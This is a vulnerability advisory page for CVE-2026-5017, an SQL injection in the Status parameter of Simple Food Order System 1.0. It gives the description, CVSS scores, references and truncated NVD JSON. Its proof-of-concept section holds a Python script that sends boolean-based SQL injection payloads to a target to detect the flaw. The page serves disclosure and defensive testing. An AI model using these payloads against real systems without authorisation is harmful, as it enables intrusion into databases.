CVE-2026-5017

Description

A security flaw has been discovered in code-projects Simple Food Order System 1.0. This impacts an unknown function of the file /all-tickets.php of the component Parameter Handler. Performing a manipulation of the argument Status results in sql injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:carmelo:simple_food_order_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Simple Food Order System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_sql_injection(url):
    """
    PoC for CVE-2026-5017 SQL Injection in /all-tickets.php
    """
    target_url = f"{url}/all-tickets.php"
    # Testing payload based on boolean-based SQL injection logic
    # Assuming the Status parameter is vulnerable
    payload_true = "?Status=1' AND 1=1-- -"
    payload_false = "?Status=1' AND 1=2-- -"

    try:
        response_true = requests.get(target_url + payload_true)
        response_false = requests.get(target_url + payload_false)

        # Simple analysis: check if responses differ indicating SQL execution
        if response_true.status_code == 200 and response_false.status_code == 200:
            if response_true.text != response_false.text:
                print("[+] Potential SQL Injection vulnerability detected!")
                print(f"    - True Payload length: {len(response_true.text)}")
                print(f"    - False Payload length: {len(response_false.text)}")
            else:
                print("[-] Responses are identical, vulnerability might not be exploitable via this payload.")
        else:
            print(f"[-] Unexpected HTTP status codes: {response_true.status_code}, {response_false.status_code}")

    except Exception as e:
        print(f"[!] Error during request: {e}")

if __name__ == "__main__":
    target_host = "http://target-ip" # Replace with actual target
    check_sql_injection(target_host)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5017
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5017
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5017/
[4] VulDB https://vuldb.com/cve/CVE-2026-5017
[5] https://code-projects.org/
[6] https://github.com/6Justdododo6/CVE/issues/15
[7] https://vuldb.com/submit/779331
[8] https://vuldb.com/vuln/353902
[9] https://vuldb.com/vuln/353902/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5017", "sourceIdentifier": "[email protected]", "published": "2026-03-28T23:16:43.597", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in code-projects Simple Food Order System 1.0. This impacts an unknown function of the file /all-tickets.php of the component Parameter Handler. Performing a manipulation of the argument Status results in sql injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks."}, {"lang": "es", "value": "Se ha descubierto una vulnerabilidad de seguridad en code-projects Simple Food Order System 1.0. Esto afecta a una función desconocida del archivo /all-tickets.php del componente Gestor de Parámetros. La manipulación del argumento Status resulta en inyección SQL. El ataque puede iniciarse remotamente. El exploit ha sido publicado y puede ser utilizado para ataques."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:carmelo:simple_food_order_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "241FC05F-317E-46C5-B9C7-A3A53DD97B63"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/6Justdododo6/CVE/issues/15", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://vuldb.com/submit/779331", "source": "[email protected]", "tags": ["VDB Entry", "Third Party Advisory"]}, {"url": "https://vuldb.com/vuln/353902", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/353902/cti", "source": "c ... (truncated)